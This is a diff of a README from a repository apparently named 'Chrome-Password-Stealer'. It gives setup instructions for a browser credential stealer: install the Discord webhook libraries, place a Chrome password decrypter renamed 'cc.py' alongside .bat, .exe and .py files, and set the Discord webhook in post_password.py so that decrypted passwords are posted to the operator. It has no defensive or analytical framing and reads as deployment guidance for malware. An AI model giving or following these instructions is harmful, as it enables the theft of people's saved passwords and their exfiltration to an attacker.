Sniper12356/Chrome-Password-Stealer/README.md

-do "pip install discord && pip install discord_webhooks" copy and paste. take the decrypter file and put it into the pswdstlr folder download the .bat .exe .py files from this github and put it in there MAKE SURE TO NAME IT "cc.py" OR ELSE IT WONT WORK.
+do "pip install discord && pip install discord_webhooks" copy and paste. take the decrypter file and put it into the pswdstlr folder download the .bat .exe .py files from this github and put it in there MAKE SURE TO NAME THE DECRYPTOR FILE (the decrypt-chrome-passwords) "cc.py" OR ELSE IT WONT WORK.
 -----------------------------------------------------------------------
 BEFORE STARTING:
 CHANGE THE DISCORD WEBHOOK FROM THE post_password.py